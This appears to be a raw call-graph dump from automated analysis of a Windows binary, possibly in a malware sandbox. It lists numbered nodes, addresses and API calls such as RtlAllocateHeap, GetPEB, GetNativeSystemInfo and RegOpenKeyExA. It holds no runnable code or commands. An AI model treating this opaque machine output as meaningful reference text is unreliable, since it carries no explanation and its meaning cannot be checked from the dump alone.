RtlAllocateHeap 13285->13286 13287 da7df4 13286->13287 13288 da5c10 4 API calls 13287->13288 13290 da7dff shared_ptr 13288->13290 13289 da7ed3 GetNativeSystemInfo 13291 da7ed7 13289->13291 13290->13289 13290->13291 13290->13294 13292 da8019 13291->13292 13293 da7f3f 13291->13293 13291->13294 13296 db7a00 RtlAllocateHeap 13292->13296 13295 db7a00 RtlAllocateHeap 13293->13295 13294->12935 13297 da7f60 13295->13297 13298 da8045 13296->13298 13299 da5c10 4 API calls 13297->13299 13300 da5c10 4 API calls 13298->13300 13301 da7f67 13299->13301 13302 da804c 13300->13302 13303 db7a00 RtlAllocateHeap 13301->13303 13304 db7a00 RtlAllocateHeap 13302->13304 13305 da7f7f 13303->13305 13306 da8064 13304->13306 13307 da5c10 4 API calls 13305->13307 13308 da5c10 4 API calls 13306->13308 13311 da7f86 13307->13311 13309 da806b 13308->13309 13310 db7a00 RtlAllocateHeap 13309->13310 13312 da809c 13310->13312 14253 dd8bbe 13311->14253 13314 da5c10 4 API calls 13312->13314 13315 da80a3 13314->13315 13316 da5730 RtlAllocateHeap 13315->13316 13317 da80b2 13316->13317 13318 db7a00 RtlAllocateHeap 13317->13318 13319 da80ed 13318->13319 13320 da5c10 4 API calls 13319->13320 13321 da80f4 13320->13321 13322 db7a00 RtlAllocateHeap 13321->13322 13323 da810c 13322->13323 13324 da5c10 4 API calls 13323->13324 13325 da8113 13324->13325 13326 db7a00 RtlAllocateHeap 13325->13326 13327 da8144 13326->13327 13328 da5c10 4 API calls 13327->13328 13329 da814b 13328->13329 13330 da5730 RtlAllocateHeap 13329->13330 13331 da815a 13330->13331 13332 db7a00 RtlAllocateHeap 13331->13332 13333 da8195 13332->13333 13334 da5c10 4 API calls 13333->13334 13335 da819c 13334->13335 13336 db7a00 RtlAllocateHeap 13335->13336 13337 da81b4 13336->13337 13338 da5c10 4 API calls 13337->13338 13339 da81bb 13338->13339 13340 db7a00 RtlAllocateHeap 13339->13340 13341 da81ec 13340->13341 13342 da5c10 4 API calls 13341->13342 13343 da81f3 13342->13343 13344 da5730 RtlAllocateHeap 13343->13344 13345 da8202 13344->13345 13346 db7a00 RtlAllocateHeap 13345->13346 13347 da823d 13346->13347 13348 da5c10 4 API calls 13347->13348 13349 da8244 13348->13349 13350 db7a00 RtlAllocateHeap 13349->13350 13351 da825c 13350->13351 13352 da5c10 4 API calls 13351->13352 13353 da8263 13352->13353 13354 db7a00 RtlAllocateHeap 13353->13354 13355 da8294 13354->13355 13356 da5c10 4 API calls 13355->13356 13357 da829b 13356->13357 13358 da5730 RtlAllocateHeap 13357->13358 13358->13294 13360 da45d4 13359->13360 13360->13360 13361 db80c0 RtlAllocateHeap 13360->13361 13362 da4647 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13360->13362 13361->13362 13362->12939 13364 da83e5 __cftof 13363->13364 13365 db7a00 RtlAllocateHeap 13364->13365 13374 da8403 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13364->13374 13366 da841c 13365->13366 13367 da5c10 4 API calls 13366->13367 13368 da8427 13367->13368 13369 db7a00 RtlAllocateHeap 13368->13369 13370 da8449 13369->13370 13371 da5c10 4 API calls 13370->13371 13372 da8454 shared_ptr 13371->13372 13373 da8524 GetNativeSystemInfo 13372->13373 13372->13374 13373->13374 13374->12943 13376 db7e2c 13375->13376 13379 db7e01 13375->13379 13377 db7f20 13376->13377 13380 db7f1b 13376->13380 13381 db7e80 13376->13381 13382 db7ea7 13376->13382 13378 db9270 RtlAllocateHeap 13377->13378 13387 db7e91 shared_ptr 13378->13387 13379->13007 13383 da2480 RtlAllocateHeap 13380->13383 13381->13380 13384 db7e8b 13381->13384 13386 dbd3e2 RtlAllocateHeap 13382->13386 13382->13387 13383->13377 13385 dbd3e2 RtlAllocateHeap 13384->13385 13385->13387 13386->13387 13387->13007 13391 db777b 13388->13391 13399 db7864 shared_ptr 13388->13399 13389 db9270 RtlAllocateHeap 13390 db78f6 13389->13390 13394 da2480 RtlAllocateHeap 13390->13394 13392 db77ea 13391->13392 13393 db7811 13391->13393 13398 db77fb 13391->13398 13391->13399 13392->13390 13396 dbd3e2 RtlAllocateHeap 13392->13396 13397 dbd3e2 RtlAllocateHeap 13393->13397 13393->13398 13395 db78fb 13394->13395 13396->13398 13397->13398 13398->13389 13398->13399 13399->13010 13401 db8dc9 13400->13401 13402 db8cc3 13400->13402 13403 db9270 RtlAllocateHeap 13401->13403 13406 db8d2f 13402->13406 13407 db8d05 13402->13407 13404 db8dce 13403->13404 13405 da2480 RtlAllocateHeap 13404->13405 13411 db8d16 shared_ptr 13405->13411 13410 dbd3e2 RtlAllocateHeap 13406->13410 13406->13411 13407->13404 13408 db8d10 13407->13408 13409 dbd3e2 RtlAllocateHeap 13408->13409 13409->13411 13410->13411 13411->13010 13413 db8339 13412->13413 13414 db834d 13413->13414 13415 db8f40 RtlAllocateHeap 13413->13415 13414->13107 13415->13414 13417 db8248 13416->13417 13418 db8292 13416->13418 13417->13418 13419 db8251 13417->13419 13421 db8f40 RtlAllocateHeap 13418->13421 13423 db82a1 13418->13423 13420 db9280 RtlAllocateHeap 13419->13420 13422 db825a 13420->13422 13421->13423 13422->13109 13423->13109 13425 db80c0 RtlAllocateHeap 13424->13425 13426 da49f3 13425->13426 13427 db80c0 RtlAllocateHeap 13426->13427 13428 da4a0c 13427->13428 14256 da4690 13428->14256 13430 da4a99 shared_ptr 13430->13164 13457 db7f80 13431->13457 13433 da596b 13434 da59e0 13433->13434 13435 db7f80 RtlAllocateHeap 13434->13435 13448 da5a45 13435->13448 13436 da5bdd __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13436->13179 13437 db7a00 RtlAllocateHeap 13437->13448 13438 da5c09 13439 db8200 RtlAllocateHeap 13438->13439 13441 da5c0e 13439->13441 13440 db80c0 RtlAllocateHeap 13440->13448 13442 da5940 RtlAllocateHeap 13441->13442 13444 da5c54 13442->13444 13445 da59e0 4 API calls 13444->13445 13446 da5c6a 13445->13446 13447 da4b30 4 API calls 13446->13447 13449 da5c7b shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13447->13449 13448->13436 13448->13437 13448->13438 13448->13440 13470 da5730 13448->13470 13449->13179 13451 da4dc2 13450->13451 13455 da4b92 13450->13455 13451->13181 13453 da4ce5 13453->13451 13454 db8ca0 RtlAllocateHeap 13453->13454 13454->13453 13455->13453 13456 db8ca0 RtlAllocateHeap 13455->13456 13476 dd6da6 13455->13476 13456->13455 13459 db7f9e __cftof 13457->13459 13461 db7fc7 13457->13461 13458 db9270 RtlAllocateHeap 13460 db80b8 13458->13460 13459->13433 13464 da2480 RtlAllocateHeap 13460->13464 13462 db801b 13461->13462 13463 db803e 13461->13463 13468 db802c __cftof 13461->13468 13462->13460 13466 dbd3e2 RtlAllocateHeap 13462->13466 13467 dbd3e2 RtlAllocateHeap 13463->13467 13463->13468 13465 db80bd 13464->13465 13466->13468 13467->13468 13468->13458 13469 db8095 shared_ptr 13468->13469 13469->13433 13474 da5860 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13470->13474 13475 da5799 shared_ptr 13470->13475 13471 da592a 13473 db8200 RtlAllocateHeap 13471->13473 13472 db80c0 RtlAllocateHeap 13472->13475 13473->13474 13474->13448 13475->13471 13475->13472 13475->13474 13477 dd6db4 13476->13477 13478 dd6dc2 __fassign 13476->13478 13481 dd6d19 13477->13481 13478->13455 13482 dd690a __fassign 3 API calls 13481->13482 13483 dd6d2c 13482->13483 13486 dd6d52 13483->13486 13485 dd6d3d 13485->13455 13487 dd6d8f 13486->13487 13488 dd6d5f 13486->13488 13497 ddb67d 13487->13497 13490 dd6d6e __fassign 13488->13490 13492 ddb6a1 13488->13492 13490->13485 13493 dd690a __fassign 3 API calls 13492->13493 13495 ddb6be 13493->13495 13494 ddb6ce __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13494->13490 13495->13494 13501 ddf1bf 13495->13501 13498 ddb688 13497->13498 13499 ddb5fb __fassign 2 API calls 13498->13499 13500 ddb698 13499->13500 13500->13490 13502 dd690a __fassign 3 API calls 13501->13502 13503 ddf1df __fassign 13502->13503 13504 ddf232 __cftof __fassign __freea __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13503->13504 13505 ddb04b __fassign RtlAllocateHeap 13503->13505 13504->13494 13505->13504 13507 dd887a 13506->13507 13508 dd690a __fassign 3 API calls 13507->13508 13511 dd888f __dosmaperr ___std_exception_copy 13507->13511 13510 dd88bf 13508->13510 13509 dd6d52 3 API calls 13509->13510 13510->13509 13510->13511 13511->13220 13513 db9294 13512->13513 13516 db92a5 13513->13516 13630 db94e0 13513->13630 13515 db932b 13515->13228 13516->13228 13518 db367f 13517->13518 13525 db3e6f shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13517->13525 13519 db80c0 RtlAllocateHeap 13518->13519 13520 db36b0 13519->13520 13521 db4327 13520->13521 13522 db80c0 RtlAllocateHeap 13520->13522 13523 db8200 RtlAllocateHeap 13521->13523 13524 db36ff 13522->13524 13526 db432c 13523->13526 13524->13521 13528 db80c0 RtlAllocateHeap 13524->13528 13525->13228 13527 db8200 RtlAllocateHeap 13526->13527 13531 db4331 13527->13531 13529 db3743 13528->13529 13529->13521 13530 db3765 13529->13530 13532 db80c0 RtlAllocateHeap 13530->13532 13534 db8200 RtlAllocateHeap 13531->13534 13533 db3785 13532->13533 13535 db7a00 RtlAllocateHeap 13533->13535 13538 db4340 13534->13538 13536 db3798 13535->13536 13537 da5c10 4 API calls 13536->13537 13539 db37a3 13537->13539 13936 dbc199 13538->13936 13539->13526 13541 db37ef 13539->13541 13542 db80c0 RtlAllocateHeap 13541->13542 13545 db3811 shared_ptr 13542->13545 13543 dbc1d9 RtlAllocateHeap 13543->13525 13544 da98f0 4 API calls 13546 db3872 13544->13546 13545->13531 13545->13544 13547 db7a00 RtlAllocateHeap 13546->13547 13552 db3c79 shared_ptr 13546->13552 13548 db3889 13547->13548 13549 da5c10 4 API calls 13548->13549 13550 db3894 13549->13550 13551 db80c0 RtlAllocateHeap 13550->13551 13553 db38dc shared_ptr 13551->13553 13552->13525 13552->13543 13553->13531 13554 db39bd 13553->13554 13606 db3ab7 shared_ptr __dosmaperr 13553->13606 13555 db80c0 RtlAllocateHeap 13554->13555 13556 db39da 13555->13556 13642 daad70 13556->13642 13557 dd8ab6 3 API calls 13558 db3b7a 13557->13558 13558->13538 13560 db3b89 13558->13560 13560->13552 13562 db3c8d 13560->13562 13563 db3ba2 13560->13563 13564 db3f42 13560->13564 13565 db3e74 13560->13565 13561 db39e5 shared_ptr 13561->13538 13566 db7a00 RtlAllocateHeap 13561->13566 13570 db80c0 RtlAllocateHeap 13562->13570 13567 db80c0 RtlAllocateHeap 13563->13567 13571 db7a00 RtlAllocateHeap 13564->13571 13568 db80c0 RtlAllocateHeap 13565->13568 13569 db3a96 13566->13569 13572 db3bca 13567->13572 13573 db3e9c 13568->13573 13574 db7a00 RtlAllocateHeap 13569->13574 13575 db3cb5 13570->13575 13576 db3f56 13571->13576 13577 db7a00 RtlAllocateHeap 13572->13577 13578 db7a00 RtlAllocateHeap 13573->13578 13579 db3aa8 13574->13579 13580 db7a00 RtlAllocateHeap 13575->13580 13581 db7a00 RtlAllocateHeap 13576->13581 13582 db3be8 13577->13582 13583 db3eba 13578->13583 13584 da49a0 RtlAllocateHeap 13579->13584 13585 db3cd3 13580->13585 13586 db3f6e 13581->13586 13587 da5c10 4 API calls 13582->13587 13588 da5c10 4 API calls 13583->13588 13584->13606 13589 da5c10 4 API calls 13585->13589 13590 db7a00 RtlAllocateHeap 13586->13590 13593 db3bef 13587->13593 13594 db3ec1 13588->13594 13591 db3cda 13589->13591 13592 db3f86 13590->13592 13596 db7a00 RtlAllocateHeap 13591->13596 13597 db7a00 RtlAllocateHeap 13592->13597 13598 db7a00 RtlAllocateHeap 13593->13598 13595 db7a00 RtlAllocateHeap 13594->13595 13599 db3ed9 13595->13599 13600 db3cef 13596->13600 13601 db3f98 13597->13601 13602 db3c07 13598->13602 13603 db7a00 RtlAllocateHeap 13599->13603 13604 db7a00 RtlAllocateHeap 13600->13604 13809 db2f10 13601->13809 13607 db7a00 RtlAllocateHeap 13602->13607 13608 db3ef1 13603->13608 13609 db3d07 13604->13609 13606->13538 13606->13557 13610 db3c1f 13607->13610 13611 db7a00 RtlAllocateHeap 13608->13611 13612 db7a00 RtlAllocateHeap 13609->13612 13613 db7a00 RtlAllocateHeap 13610->13613 13615 db3f09 13611->13615 13616 db3d1f 13612->13616 13614 db3c37 13613->13614 13617 db7a00 RtlAllocateHeap 13614->13617 13618 db7a00 RtlAllocateHeap 13615->13618 13619 db7a00 RtlAllocateHeap 13616->13619 13620 db3c4f 13617->13620 13621 db3f21 13618->13621 13622 db3d37 13619->13622 13623 db7a00 RtlAllocateHeap 13620->13623 13624 db7a00 RtlAllocateHeap 13621->13624 13625 db7a00 RtlAllocateHeap 13622->13625 13626 db3c67 13623->13626 13624->13626 13627 db3d49 13625->13627 13629 db7a00 RtlAllocateHeap 13626->13629 13653 db1ec0 13627->13653 13629->13552 13631 db950b 13630->13631 13632 db9619 13630->13632 13636 db9579 13631->13636 13637 db9552 13631->13637 13633 db9270 RtlAllocateHeap 13632->13633 13634 db961e 13633->13634 13635 da2480 RtlAllocateHeap 13634->13635 13641 db9563 shared_ptr 13635->13641 13640 dbd3e2 RtlAllocateHeap 13636->13640 13636->13641 13637->13634 13638 db955d 13637->13638 13639 dbd3e2 RtlAllocateHeap 13638->13639 13639->13641 13640->13641 13641->13515 13644 daaec0 13642->13644 13643 daaee6 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13643->13561 13644->13643 13645 da45b0 RtlAllocateHeap 13644->13645 13646 daafab __cftof 13645->13646 13939 da55f0 13646->13939 13648 dab04e 13649 db80c0 RtlAllocateHeap 13648->13649 13650 dab08b 13649->13650 13651 db8200 RtlAllocateHeap 13650->13651 13652 dab18c 13651->13652 13654 db80c0 RtlAllocateHeap 13653->13654 13655 db1f5b 13654->13655 13656 db1fd8 13655->13656 13657 db1f68 13655->13657 13658 db80c0 RtlAllocateHeap 13656->13658 13659 db7a00 RtlAllocateHeap 13657->13659 13665 db2017 shared_ptr 13658->13665 13660 db1f82 13659->13660 13661 da5c10 4 API calls 13660->13661 13662 db1f89 13661->13662 13663 db7a00 RtlAllocateHeap 13662->13663 13664 db1f9f 13663->13664 13667 db7a00 RtlAllocateHeap 13664->13667 13666 db2131 13665->13666 13668 db20af 13665->13668 13669 db2ec5 13665->13669 13697 db2a26 shared_ptr 13665->13697 13670 db7a00 RtlAllocateHeap 13666->13670 13672 db1fb7 13667->13672 13673 db80c0 RtlAllocateHeap 13668->13673 13674 db8200 RtlAllocateHeap 13669->13674 13671 db2140 13670->13671 13675 da5c10 4 API calls 13671->13675 13676 db7a00 RtlAllocateHeap 13672->13676 13684 db20d3 shared_ptr 13673->13684 13677 db2eca 13674->13677 13686 db214b 13675->13686 13678 db1fcf 13676->13678 13680 db8200 RtlAllocateHeap 13677->13680 13683 db7a00 RtlAllocateHeap 13678->13683 13679 dbc199 std::_Xinvalid_argument RtlAllocateHeap 13681 db2ef2 13679->13681 13688 db2ecf 13680->13688 13685 dbc1d9 RtlAllocateHeap 13681->13685 13682 db80c0 RtlAllocateHeap 13682->13666 13687 db2bec 13683->13687 13684->13682 13684->13697 13686->13677 13689 db21a2 13686->13689 13690 dae530 10 API calls 13687->13690 13692 dbc199 std::_Xinvalid_argument RtlAllocateHeap 13688->13692 13691 db80c0 RtlAllocateHeap 13689->13691 13690->13697 13695 db21c7 shared_ptr 13691->13695 13692->13697 13693 db7a00 RtlAllocateHeap 13694 db2232 13693->13694 13696 da5c10 4 API calls 13694->13696 13695->13688 13695->13693 13698 db223d 13696->13698 13697->13679 13700 db2ea0 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13697->13700 13699 db80c0 RtlAllocateHeap 13698->13699 13701 db22a4 shared_ptr __dosmaperr 13699->13701 13700->13552 13701->13688 13702 dd8ab6 3 API calls 13701->13702 13703 db2355 13702->13703 13703->13688 13704 db2364 13703->13704 13704->13681 13706 db265b 13704->13706 13707 db24aa 13704->13707 13708 db237d 13704->13708 13709 db25a7 13704->13709 13754 db23d2 shared_ptr 13704->13754 13705 db7a00 RtlAllocateHeap 13713 db2730 13705->13713 13711 db7a00 RtlAllocateHeap 13706->13711 13710 db7a00 RtlAllocateHeap 13707->13710 13714 db7a00 RtlAllocateHeap 13708->13714 13712 db7a00 RtlAllocateHeap 13709->13712 13715 db24c1 13710->13715 13716 db2672 13711->13716 13717 db25be 13712->13717 13718 db7a00 RtlAllocateHeap 13713->13718 13719 db2394 13714->13719 13721 db7a00 RtlAllocateHeap 13715->13721 13722 db7a00 RtlAllocateHeap 13716->13722 13723 db7a00 RtlAllocateHeap 13717->13723 13735 db2742 13718->13735 13720 db7a00 RtlAllocateHeap 13719->13720 13724 db23ac 13720->13724 13725 db24d9 13721->13725 13726 db268a 13722->13726 13727 db25d6 13723->13727 13728 db7a00 RtlAllocateHeap 13724->13728 13729 db7a00 RtlAllocateHeap 13725->13729 13730 db7a00 RtlAllocateHeap 13726->13730 13731 db7a00 RtlAllocateHeap 13727->13731 13732 db23c4 13728->13732 13743 db24f1 13729->13743 13733 db26a2 13730->13733 13734 db25ee 13731->13734 13966 da8d30 13732->13966 13986 da8eb0 13733->13986 13976 da9030 13734->13976 13739 db2b73 13735->13739 13996 dd67b7 13735->13996 13741 db7a00 RtlAllocateHeap 13739->13741 13744 db2b8d 13741->13744 13742 db277b 13745 db7a00 RtlAllocateHeap 13742->13745 13746 db80c0 RtlAllocateHeap 13743->13746 13747 da5c10 4 API calls 13744->13747 13753 db2790 shared_ptr __dosmaperr 13745->13753 13746->13754 13748 db2b94 13747->13748 13749 db7a00 RtlAllocateHeap 13748->13749 13750 db2baa 13749->13750 13751 db7a00 RtlAllocateHeap 13750->13751 13752 db2bc2 13751->13752 13755 db7a00 RtlAllocateHeap 13752->13755 13753->13697 13756 dd8ab6 3 API calls 13753->13756 13754->13697 13754->13705 13755->13678 13757 db2849 13756->13757 13757->13681 13757->13697 13757->13739 13758 db2871 13757->13758 13759 db7a00 RtlAllocateHeap 13758->13759 13760 db2888 13759->13760 13761 db7a00 RtlAllocateHeap 13760->13761 13762 db289d 13761->13762 14000 da77b0 13762->14000 13764 db28a6 13765 db28c1 13764->13765 13766 db2b16 13764->13766 13768 db7a00 RtlAllocateHeap 13765->13768 13767 db7a00 RtlAllocateHeap 13766->13767 13769 db2b20 13767->13769 13770 db28cb 13768->13770 13771 da5c10 4 API calls 13769->13771 13772 da5c10 4 API calls 13770->13772 13773 db2b27 13771->13773 13774 db28d2 13772->13774 13775 db7a00 RtlAllocateHeap 13773->13775 13776 db7a00 RtlAllocateHeap 13774->13776 13778 db2b3d 13775->13778 13777 db28e8 13776->13777 13779 db7a00 RtlAllocateHeap 13777->13779 13780 db7a00 RtlAllocateHeap 13778->13780 13781 db2900 13779->13781 13782 db2b55 13780->13782 13783 db7a00 RtlAllocateHeap 13781->13783 13784 db7a00 RtlAllocateHeap 13782->13784 13785 db2918 13783->13785 13784->13678 13786 db7a00 RtlAllocateHeap 13785->13786 13787 db292a 13786->13787 14013 dae530 13787->14013 13789 db2933 13789->13697 13790 db7a00 RtlAllocateHeap 13789->13790 13791 db2994 13790->13791 13792 da5c10 4 API calls 13791->13792 13793 db299f 13792->13793 13794 db8320 RtlAllocateHeap 13793->13794 13795 db29b3 13794->13795 14147 db85e0 13795->14147 13797 db29c7 13798 db8320 RtlAllocateHeap 13797->13798 13799 db29d7 13798->13799 13800 db7a00 RtlAllocateHeap 13799->13800 13801 db29f7 13800->13801 14151 da8980 13801->14151 13803 db29fe 13804 db7a00 RtlAllocateHeap 13803->13804 13805 db2a13 13804->13805 13806 da5c10 4 API calls 13805->13806 13807 db2a1a 13806->13807 14159 da5ee0 RegOpenKeyExA 13807->14159 13810 db2f54 13809->13810 13811 db7a00 RtlAllocateHeap 13810->13811 13812 db2f68 13811->13812 13813 da5c10 4 API calls 13812->13813 13814 db2f6f 13813->13814 13815 db7a00 RtlAllocateHeap 13814->13815 13816 db2f82 13815->13816 13817 db7a00 RtlAllocateHeap 13816->13817 13818 db2f97 13817->13818 13819 db7a00 RtlAllocateHeap 13818->13819 13820 db2fac 13819->13820 13821 db7a00 RtlAllocateHeap 13820->13821 13822 db350a 13821->13822 13823 dae530 10 API calls 13822->13823 13824 db3513 shared_ptr 13823->13824 13825 db80c0 RtlAllocateHeap 13824->13825 13827 db360a shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13824->13827 13826 db36b0 13825->13826 13828 db4327 13826->13828 13829 db80c0 RtlAllocateHeap 13826->13829 13827->13552 13830 db8200 RtlAllocateHeap 13828->13830 13831 db36ff 13829->13831 13832 db432c 13830->13832 13831->13828 13834 db80c0 RtlAllocateHeap 13831->13834 13833 db8200 RtlAllocateHeap 13832->13833 13837 db4331 13833->13837 13835 db3743 13834->13835 13835->13828 13836 db3765 13835->13836 13838 db80c0 RtlAllocateHeap 13836->13838 13840 db8200 RtlAllocateHeap 13837->13840 13839 db3785 13838->13839 13841 db7a00 RtlAllocateHeap 13839->13841 13844 db4340 13840->13844 13842 db3798 13841->13842 13843 da5c10 4 API calls 13842->13843 13845 db37a3 13843->13845 13846 dbc199 std::_Xinvalid_argument RtlAllocateHeap 13844->13846 13845->13832 13847 db37ef 13845->13847 13858 db3c79 shared_ptr 13846->13858 13848 db80c0 RtlAllocateHeap 13847->13848 13849 db3811 shared_ptr 13848->13849 13849->13837 13851 da98f0 4 API calls 13849->13851 13850 dbc1d9 RtlAllocateHeap 13850->13827 13852 db3872 13851->13852 13853 db7a00 RtlAllocateHeap 13852->13853 13852->13858 13854 db3889 13853->13854 13855 da5c10 4 API calls 13854->13855 13856 db3894 13855->13856 13857 db80c0 RtlAllocateHeap 13856->13857 13859 db38dc shared_ptr 13857->13859 13858->13827 13858->13850 13859->13837 13860 db39bd 13859->13860 13910 db3ab7 shared_ptr __dosmaperr 13859->13910 13861 db80c0 RtlAllocateHeap 13860->13861 13862 db39da 13861->13862 13865 daad70 4 API calls 13862->13865 13863 dd8ab6 3 API calls 13864 db3b7a 13863->13864 13864->13844 13866 db3b89 13864->13866 13877 db39e5 shared_ptr 13865->13877 13866->13858 13867 db3c8d 13866->13867 13868 db3ba2 13866->13868 13869 db3f42 13866->13869 13870 db3e74 13866->13870 13875 db80c0 RtlAllocateHeap 13867->13875 13872 db80c0 RtlAllocateHeap 13868->13872 13876 db7a00 RtlAllocateHeap 13869->13876 13873 db80c0 RtlAllocateHeap 13870->13873 13871 db7a00 RtlAllocateHeap 13874 db3a96 13871->13874 13878 db3bca 13872->13878 13879 db3e9c 13873->13879 13880 db7a00 RtlAllocateHeap 13874->13880 13881 db3cb5 13875->13881 13882 db3f56 13876->13882 13877->13844 13877->13871 13883 db7a00 RtlAllocateHeap 13878->13883 13884 db7a00 RtlAllocateHeap 13879->13884 13885 db3aa8 13880->13885 13886 db7a00 RtlAllocateHeap 13881->13886 13887 db7a00 RtlAllocateHeap 13882->13887 13888 db3be8 13883->13888 13889 db3eba 13884->13889 13890 da49a0 RtlAllocateHeap 13885->13890 13891 db3cd3 13886->13891 13892 db3f6e 13887->13892 13893 da5c10 4 API calls 13888->13893 13894 da5c10 4 API calls 13889->13894 13890->13910 13895 da5c10 4 API calls 13891->13895 13896 db7a00 RtlAllocateHeap 13892->13896 13899 db3bef 13893->13899 13900 db3ec1 13894->13900 13897 db3cda 13895->13897 13898 db3f86 13896->13898 13902 db7a00 RtlAllocateHeap 13897->13902 13903 db7a00 RtlAllocateHeap 13898->13903 13904 db7a00 RtlAllocateHeap 13899->13904 13901 db7a00 RtlAllocateHeap 13900->13901 13905 db3ed9 13901->13905 13906 db3cef 13902->13906 13907 db3f98 13903->13907 13908 db3c07 13904->13908 13909 db7a00 RtlAllocateHeap 13905->13909 13911 db7a00 RtlAllocateHeap 13906->13911 13912 db2f10 13 API calls 13907->13912 13913 db7a00 RtlAllocateHeap 13908->13913 13914 db3ef1 13909->13914 13910->13844 13910->13863 13915 db3d07 13911->13915 13912->13858 13916 db3c1f 13913->13916 13917 db7a00 RtlAllocateHeap 13914->13917 13918 db7a00 RtlAllocateHeap 13915->13918 13919 db7a00 RtlAllocateHeap 13916->13919 13921 db3f09 13917->13921 13922 db3d1f 13918->13922 13920 db3c37 13919->13920 13923 db7a00 RtlAllocateHeap 13920->13923 13924 db7a00 RtlAllocateHeap 13921->13924 13925 db7a00 RtlAllocateHeap 13922->13925 13926 db3c4f 13923->13926 13927 db3f21 13924->13927 13928 db3d37 13925->13928 13929 db7a00 RtlAllocateHeap 13926->13929 13930 db7a00 RtlAllocateHeap 13927->13930 13931 db7a00 RtlAllocateHeap 13928->13931 13932 db3c67 13929->13932 13930->13932 13933 db3d49 13931->13933 13935 db7a00 RtlAllocateHeap 13932->13935 13934 db1ec0 13 API calls 13933->13934 13934->13858 13935->13858 14247 dbc0e9 13936->14247 13938 dbc1aa std::_Xinvalid_argument 13940 da5610 13939->13940 13942 da5710 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13940->13942 13943 da22c0 13940->13943 13942->13648 13946 da2280 13943->13946 13947 da2296 13946->13947 13950 dd87f8 13947->13950 13953 dd7609 13950->13953 13952 da22a4 13952->13940 13954 dd7649 13953->13954 13958 dd7631 __dosmaperr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z ___std_exception_copy 13953->13958 13955 dd690a __fassign 3 API calls 13954->13955 13954->13958 13956 dd7661 13955->13956 13959 dd7bc4 13956->13959 13958->13952 13961 dd7bd5 13959->13961 13960 dd7be4 __dosmaperr ___std_exception_copy 13960->13958 13961->13960 13962 dd8168 GetPEB GetPEB RtlAllocateHeap 13961->13962 13963 dd7dc2 GetPEB GetPEB RtlAllocateHeap 13961->13963 13964 dd7de8 GetPEB GetPEB RtlAllocateHeap 13961->13964 13965 dd7f36 GetPEB GetPEB RtlAllocateHeap 13961->13965 13962->13961 13963->13961 13964->13961 13965->13961 13967 da8d80 13966->13967 13968 db7a00 RtlAllocateHeap 13967->13968 13969 da8d8f 13968->13969 13970 da5c10 4 API calls 13969->13970 13971 da8d9a 13970->13971 13972 db80c0 RtlAllocateHeap 13971->13972 13973 da8dec 13972->13973 13974 db8220 RtlAllocateHeap 13973->13974 13975 da8dfe shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13974->13975 13975->13754 13977 da9080 13976->13977 13978 db7a00 RtlAllocateHeap 13977->13978 13979 da908f 13978->13979 13980 da5c10 4 API calls 13979->13980 13981 da909a 13980->13981 13982 db80c0 RtlAllocateHeap 13981->13982 13983 da90ec 13982->13983 13984 db8220 RtlAllocateHeap 13983->13984 13985 da90fe shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13984->13985 13985->13754 13987 da8f00 13986->13987 13988 db7a00 RtlAllocateHeap 13987->13988 13989 da8f0f 13988->13989 13990 da5c10 4 API calls 13989->13990 13991 da8f1a 13990->13991 13992 db80c0 RtlAllocateHeap 13991->13992 13993 da8f6c 13992->13993 13994 db8220 RtlAllocateHeap 13993->13994 13995 da8f7e shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13994->13995 13995->13754 13998 dd67c3 __fassign 13996->13998 13997 dd67cd __dosmaperr ___std_exception_copy 13997->13742 13998->13997 14177 dd6740 13998->14177 14200 db8680 14000->14200 14002 da77f1 14003 db8320 RtlAllocateHeap 14002->14003 14005 da7803 shared_ptr 14003->14005 14004 db7a00 RtlAllocateHeap 14006 da7861 14004->14006 14005->14004 14012 da78a6 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14005->14012 14007 db7a00 RtlAllocateHeap 14006->14007 14008 da787c 14007->14008 14009 da5c10 4 API calls 14008->14009 14010 da7883 14009->14010 14011 db80c0 RtlAllocateHeap 14010->14011 14011->14012 14012->13764 14014 db7a00 RtlAllocateHeap 14013->14014 14015 dae576 14014->14015 14016 da5c10 4 API calls 14015->14016 14017 dae581 14016->14017 14018 db7a00 RtlAllocateHeap 14017->14018 14019 dae59c 14018->14019 14020 da5c10 4 API calls 14019->14020 14021 dae5a7 14020->14021 14022 db9280 RtlAllocateHeap 14021->14022 14023 dae5ba 14022->14023 14024 db8320 RtlAllocateHeap 14023->14024 14025 dae5fc 14024->14025 14026 db8220 RtlAllocateHeap 14025->14026 14027 dae60d 14026->14027 14028 db8320 RtlAllocateHeap 14027->14028 14029 dae61e 14028->14029 14030 db7a00 RtlAllocateHeap 14029->14030 14031 dae7cb 14030->14031 14032 db7a00 RtlAllocateHeap 14031->14032 14033 dae7e0 14032->14033 14034 db7a00 RtlAllocateHeap 14033->14034 14035 dae7f2 14034->14035 14036 dabe30 10 API calls 14035->14036 14037 dae7fe 14036->14037 14038 db7a00 RtlAllocateHeap 14037->14038 14039 dae813 14038->14039 14040 db7a00 RtlAllocateHeap 14039->14040 14041 dae82b 